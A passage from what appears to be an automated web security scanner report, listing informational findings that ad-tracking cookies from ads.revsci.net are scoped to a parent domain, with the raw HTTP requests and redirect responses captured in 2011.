B1taJHpApkWWC5HQR2TSEsOPvnrTO97GqGy3v+4KyaxwMFuCLHS2kq0YgKXQMBA7NAdk77MeO9hTm31Gm0RKqWr8kM45JW+VUIho7H9Y8jWf7dAfdzDjskSOFAYILVnxSgKnS47RV57TZ72P1HE0E82c+PZVqML3+BjNrt1HwJ5CeCU3tHXiQJc2q8DAT4Eh6R5wsQQa1LW7rHc8JX9ATBuaDtmPphjkIZ8U0vbrZ9Ik58JYB0K4lccxDWK7o1rKItXy97q+0Szc2/Ipa3ZbyO1slKuyCzgqZbam9cmA=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_BFfo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_0uRB="MLsXr98vcS5joAC3camm7m2LoDlezxNylzFx7q/7jh3vp9AaQ0d9+4VlvUgGPKQSVQ0KcSykIsBNoGXZdCAjuytlySGQ8/OftgBmlbDwxFXRsomko1dhpOEfNP9MWs6AJTpJGx4KVi3NyPLg6Ty1pZmBPol2v9eYT5WRqRvcf4u7txMu41iZYICzca0HKhAQnwG5+txYSjJVizEkhHghBeBMejkXDWkFVpZFcJOam5H6TC/Tk1UQDlT2PROx4nyyaEMjdDmLFNf1MZpXO9+vMJzhD7J7mRXm6jp5YWVv1nqFetXyeSI7ZLD/HSjFMKINO4FJgacxXDy5cV+HgtmUtTj0WAtVBJbk2nr4A7CJzwfNMNhtayL1bGn7HiJkIFLdmtlcSukRVDvh+KeaKP5f8TgfTiH6y91un+b23Q=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soH0f//DC7T+Ic8+Pr1nwUVevtCuE5/4IrgrPwDhQFpkUH9FP70YBKszuOe3UntXFMcTHLwgRLgVdrk3Un+lJZ/5e0yGlLruWUfqFPMt4Ra0+I8MJVwu20bf9vn4fQdGiwg6WnLAVuwjfo+LLfaow047Iln7+U+3J6ljUNMRuOkdO+Mn/yv8Ph4raozqmp2KbF/M/a1XxqebKzuxmu8P4iJRDp1Ntv4/dIGw9D2DMN9PwOraB87GBl1xM1/boOivuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFc9G1/w0gmA6W6SqbcuheULZwHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2TFYggAzs+RZG0d0XDMaGcg3JqM/wuDWn6Wub0A/DucMtOeFRNXtMWW31c4nOqAAjGb6dEXs6cNZjpO7StgJpoDpkVKZVGLKfEh9jQ9l6nSztR6DyjuvmxCgsa46ly8aszaWZYZJmTuIQbm69sfr5mW3/PK3SvJi6DXR0PMaJsaqJ5q9fCF3PFxL8LFhHm80FFGihrqbvB3bQHHLhlk8d2VR8SeYammYKxZevEfy1KHOMBa3YpJ2lN0Opstz27gxRQgqs/InUyx+li/d9t9KwaSz3VOxH0Ri4Yywxr7Ig6qmMk9xXzakMFVw4BGQRcMBBazm2cBmuu8nKUZKWJqXd5gkwvN2O+FhcMNi6UqYZEdlhfVc9wXJMhMgKs6B4oTJPFt6VptUoFNcs35hRw4EbB8HodfVeMO1nV/ce9raL2Krjq29xAZ/HV9fbmMqTnC0kkaMMPeIJ5jGritmycpL6Y9Y5aJbbmSj7WiK4jex59VdY8bmG18R7EK55Y9XONQd8/87mj2Com+PLwweMLwYNe5Gp3WWG5eIx0v8yJwjPizFzH5yT7Gz7hpI4/A90CViAXPC38wcaxfRCbbbXW9kJ1bot+CMUBQUZbSZUiCeNUh9IFhoqHhTFLLH6caSwzmpmqVNHQI9uZrOUh8WjlexA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:16:37 GMT


17.24. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_P7r0="MLsXr98vcS5joAD3cWkfYUw1tIebrb2QmbdXm6j+DYZlI1D1a3Tl+WEpJX+o5AVFSd5d5ssFR9oWBmypI3QRTMd9I/6PS5OftgRmlbDwxFXRsomko1dhpOEfNP9Muk7A5fpJA9ZIm9+6k7zkh9lqBggAx3WL73+UqHqWE9mqgfVjx95nS6LtBhwKfHpSuWuuicmA3XLrG/+6SmU7XfZ3vRJvMOZscGw9+k14L5j+8HB8G/lNCz0tdz1Tc2vQUbdF6KzgbPJFbgeJsZqz9k5fJFuQpYQFji9Nz3OiNrFoynbIaswV9vt49UKLLPZepEQ/oN+mzl/1Qh2LgJ7ymTn6+IQ1Z099Mr8aFo0hS2iVvUixSTrzNVqt5+6nSiH5x/g0FykecCVC5C26nN221SEyIUg/ul5Ntl5t2fX3Iw=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuqwsoHteb7Jy7CW7w++Pj1nwUVKp5hB4giwRLN67eJ02IAcpR9TattCy1ZV/af3UntXFMcTHLwgRLgVdrk3Un+lJb3XnISlxM6BwpK+G0zxnclGkFzoNLleoxfXMdWEFNQlueEHqKk4v8m5CO/1Qayo6PXF0eauPV3c9T7EXoQk9NosQRnmyfAEFMPzdRxVKMZFFWBmTNLKvtHp+vkrNGGBoWZxDuFNdv4/9IGwxj5DMN9P3+raB05GBl1RM19ZujiRucYx7VVLswcQ1f1IUJRi09VP17SjeXF8PS1byMLog6r6JCmXM3DqCcDgTey7qTq6UdcC6c8x1UKaGRBOXNBq40P8xlqadT3fMivsaDXJyrPQksA71/JBfiBaR0kwCpKdeKLwh8P6+yClVnEcjrvgGFWU11CuWSGP4FzeQHic0pmrIQI7nLti10sFMz45YNec6XtAETkLs4MrS7F/mWIGZg0CVWb7mIA03xQ7zaLFmmgZA12uHXVDC6gV6smrutzBGpONeRN+LLR/l/NJOPApKr4HufQlUic+onWy9BWBBBVshcAq/LnvU1teB5UtYJ5C7P5mAr3OpuLKlHgfTGmttpgL0VyXzDTMGfmjw5nw6zHe7hs/J4H1mUfavc8FBOR6/bA0W84f3td3Pu18/klzx83xfxzHLuvw+TAEAtq1RGzg2PCmuu8Y6QRKWJqVRxAnwvNGM+FpcP/8Ir28/iz06imcQMug/OgNlMKedDlb1HVV9vVC7wnwKHKuJVDpVUb8NTQhrRQmDqSpJpdJn794JnJXLhivCBU0WzWeHPbOEHBIl5z45JWeVQIhp4ndY8gmWjouvoAjhA9vRU5f9UAjWnb+jNhP/VDoBujW/BJn1lP2ClLCBd/tfP7Nth6C+TTvWamjMT/Qpws8yJwjPizFzD5BRmgQaZd81bFD7w5YAU7KxZZwMiLN2G7rfW/kp2not+A8UFWV5bSZUiCOJVh9IFhoqH5TFLLH6cbSAzmpWKVtHQINiZqOUh8Q2Fffg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_P7r0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_P7r0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qG2X="MLsXr98vcS5joAD3cWnDV5Aua+GKE1cvxxz+0wdb2PxBN+R0RSFIK3cKZz8oN8G0yqulX+Nkf2VPR8zp6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh25YJ3Frzvooelti6k6zEn9lqBoAPz3WL73/oqHqWE9msgfVjx54HC6LNBhwOenpSuWuuicmA1XLrG/+6SmU7XfZ3vRJvMOZscGw9+k14L5j+8HB8G/lNCz0tdz1Tc2vQUbdF6KzgbPJFbYeJsZqz7lJfJFuQpYQFji9Nz3OiNrFoynbIbswV9vt49UKLLPZepEQ/oN+mzl/1Qh17QJ7ymTn6uPQ1Z099Mr8aFo0hS2iVvUixSTrzFVqt5+6nSiH5x/g0FykecCVC5C26nNIAO87Eu6zn3T771H9zRfah"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENhuqPsoH0VbKubdsLk5r8wYeKsfmvlTnrTzC5CfKnr32xlBVUczupVXWj3FnXNhNKx380C8gcE42639XwfAZ6AN2wX432Ggb+oNrVPQ3ZsOiWiEb6hJRtTKjmlJB5kt0o25kgS8xzsx140xDKigOe0nBSh8SycCIjKIXd8r6oBXIvm+mcpWCFK3py4McUT+aqPCxrJgiL1gmh/scyTrzBd7mi7j9Db8srmSpf9xH0manrGb3tTyLo9BzeM1pm4Z4wx42sitL/m0igJmBrNFIFdykeCPg5uaizqUsZbaaHNm75ZLAWADSD4+BTlHIFaYr4KcFljhkAzize7Mn1KQw+CY9n303LyCBHUX9Kq3ldlPQApQqwYwV5J8AomnJVkHK1WvaebvwjFxCe5abtr6+wm72l2qalAUmYSvTytwcTpqorZOrQqKSMuDssCULulgY7V6e4aRMbmgcF6d5vsb3VgMvEGEsch/Q6r2FzCKHbl6J5faoGwtTri343e73QfF/jyynnhcASryHb8nbpP6AD8auyeSIZLWjI9NWXhcTaMnyjgr8KUJ+RnV5P/WnnhfxeAzX9WAXYCyIItwmAiCEv6SZZLJ0oRXlJc7IwUQLA9wp9kMa3+pX4+Xv1UnR6Zoq/+eG3PaKAGVjXjXqU6HjfcEmNk+gewe5Qq6bX1b7U+tSdLAZcbvGgOch3VHJWX9SpL5QvXWovkDL40JIh557lJuK5HqysZzzbuVqpqOzMNkkD4C6oVShvoT540zXtwVrWzkCr11RoH0k0o9qPoxURd9KkGvTXu+gE5MD+jvjrPFcvO5yYVrQeKB+AZTTfjvoU7f3fIyKlcEOQyYs8W7Y2xWwRWywsuPPtpapCLyjytrZMHckyzgw/+NrKldEEogM7w5wA73pbo1MlGNnRAXV05K73LQiYXCmAeF1XflZNg3yUjPBNmGcibNUxe95+gPq0t8K50MIGZU4Qp5wi13m0qzoEVxhx94xzDLBId/GO9ydgF0Kb7brfLNrULXMHgZlCFQ2"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:47:46 GMT


17.25. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_pmcO="MLsXr9EvcS5joBD3cWnZ721Ny4Obrb2QmbdXm6j+DYZlI1D1a3Tl+WHppf6j5AVFSd5d5palIsCVdC2pI3QRDKcvXz7Py9BdorY57yZojvegdYdOXIl/MGPBcVi6n8MbTJ5osyBT/6M9/+X5L6mLc1nYs5SV2jXdpo2+sQls8XoJmdeVE7eyevMJJ5HIav7B26tZ5qSmmArqjGJZ4EN75CrDUkT4+Hzl5viyGLHP1bWxknuo8ffl6vFjB/I0L1Jta/0sFxXU26C72J8HidttY4AmpmiDxP1KfB4UPjRwpkqxI7FuRkQ0IXos2FCqYjjGV/v0vkYiw6aq49lHlZhr0dF/JrLmASkRF/Tj96Mlc98m7IbcePDnDUTURTPCTfvl2X7FBSBnd/mjFZwQ/D0AlYbZFC6FKM17kGj34Q=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENj8P6oHVhT7jqMSpxsBzahcGEwZlXdHqk2MHqUdc4h3G8jE1Gdx1SeuNf4n9Fd5chSGk4X4xYR9YkhtFwZ+EHmv2SB4fyZw5G6THRTVZKv9ZwN6fwAWYFRtpUsNW157VuVbEpV0+yQekUeVSpbwwQSdwTnHVV8AsB2zQOl6eKXyDV7k0t934W495Zf/o7gHjSLAOxqyxyXw+9CmcNbXG6N7hoJm4J7kZ4vUmh+PSIuCRUe508n6BeQjsnrCt3LcS2/139vz1JtNkjTO470dJ9YguxeImHkN6Om3dZ/y1uHbCiFbDWKJiXon0hVx8mexPKq95vTZwPLQFx7xKmx6AQgk1m73VQmS5mAwCZYr/rnlUziGLpZS7eGyLCV1VbKUdSonwsz4lZAPJ/K/e//SO2u7mNklWLo/8EjqDEPfaBVzOHevRBG6rRWhRdhEAi6uDWWbpBpDxa1t1hS9Usa1+hN5yLHExi4tP6ZyZo16fFMiWyUwl3JFN1GGI4I00kUjYd/bB7OIUFfDovyYO7TEruQGgF0MW1h4hDC0hXbwGTSf7MI/OdlGYvPLTH9bhwS8ub7GIRnD/tkfYF8QGGd+RiBGrGquaHj9IXOvOSOsOYguBuNV2KNiNHKRYMkv+rKhQY3JEdgzwRYK6ralqzqevubJ5Mi8u2RA2JC3pQufU9327VyPA6dfQvCZAlM5/Afr3eWtgPtDeb2T01bWnfngDV5H/I6mmkzMuQtNQsRIKedDlb1G54uTB77Y09xNC9XEUPAS6L7ChVa61+qfp/YKZa9KAHZjJXL9CvGBkwezmdjPbOLlC0lGDb1816hJChMWzSO8h92z4uvpAjhA9vRU5f9UAjWnb+jNhP/VDoBsjWPhJn1lP2DlLCBd/tfP7ttu6nQy/rBme5hEvKkzqDFL4jK8+7vu2+xigRaZd81bFD7xJYAU7KxZZwMiLN2HLrfW/kp1bot+A8UFQV5bSZUiCOJVh9YPho6HhTFLLH6caSAznpWK1NHQINiZqOUh8XGxfBg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pmcO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pmcO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uSRy="MLsXr08uMT5n4BD34E0aD3mU57KuyceV04R4MLubjL+IMGzosHZKWwRtA6OgFEiMTEHmonwA5mnMcoNiPWD9pzbuj7m3W9LeorY57yZojvegdYdOXIl/MGPBcVi6n8cayZ9ss4hjh79CKFc4HIN1bbTUf/N6XW+2nvaBgdzaQo3KELgZUAGAaK7xgwa46LVQp5vnTosH/Ng/dv/wp5HopVk2YhKyoWWlOUwXUI/XHrIj+eEFssu8rch61LPNWZn4aSkmVd2vw40AOpjHFKLuAWijaAQsUrJ9Z9ldVKplBpWWfQl5k//BWPZOof8fAdS04KgilPjAuIECV921+ZmyD8F2J4MFaMQYQ5VLkgCwK5k1whxQdtJFemZCtiRe7wcOgTjZPnG2NBbH8c+yxz6zEB3Z8SJJM9tpfxj1mQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE+jMAYYlW2ENjvht1yj1FbKuYNtLk7r+gePMvUp30nzQSa1YUcsKXGQ02IAcpR9TattCy1ZV/af3UntXFMcTHLwgRLgVdrk3Un+lJb33t0N7Cx1bS95yIeZFtkPXSC2LxBpOy6MQjM+vzFlErEYPBt+vGOrvKjBgqk7FujcFVpARpHpVR1q4GJegXgZqGCY54QmztWtEgF5dKMZ5FaJmdNUKntAp+ukjNGGBoXCGGOXvT2jwg0YZ1hh5NB4LPjfce11Zs47kF067qv8TvAg9c+Aee7V0LEq8tTK5HexDea4RBbmP/+1J6oen4716Cs3gAqqKQswryD7D0JvXmMlGWhpSwxUTrHW7dJdSHaH16bpTamtxox++wKGkZ6ImvrC+TNTrbLp2/Dq/p+lDIBJcw6qT/KNiBIX2G56mABa0j4wO6uBL41z+QLic3pmrISI7nLthF3ME8z47QNec6XlMETkLo6MrC7F/mWIGZg0CVWb7mYC03xR7/aL1kmgRDKA5SMvZHC0hnfxN0S51n1k6GuY8eUueiKrtjErlgWEC3x6ewVprlyC0l71UwwLIA5htfM3NSPvn9i87H067rPIEGY8qbCYCFHAfTGmttpwL0FyXzDTPmfntw5nw6z4+7hs/J5H1mUgavdn8JIblxuAeog7UcRk9DemSwV/y09U2NGIcrD+sqsGoZDN3UWO5+0KGL9f9QNzBElk3X3Ai6g8GVX6H/MWwkNGUNFDtd6obw7pNlBxlwXMJnubQMXDK3ND+JebJ0xVW/yxudKCyXa+9cciv317TM/ni5/hC1CmqcpJFELhdKYLLRKYJacJjuNIRoc/tOewx73YZOegpVOEk7VyLuTqF+YhKHwKMnWDNmhjQN6qiMvRONtcMmvY+4wcyCpJRJguD5sT4t9/ajdLpFZp+UoAU3iXLPuqgxXL7MbFIyV4lXfG0mJRy4QiVdaaImfePNtK0D9Cb6lA6iM9elAsSAG4fSqpXh73iqoG4AycUoKkea+muMjDVJ2KMQ3HlM2RncdZmXdY/A=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:03:07 GMT


17.26. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; 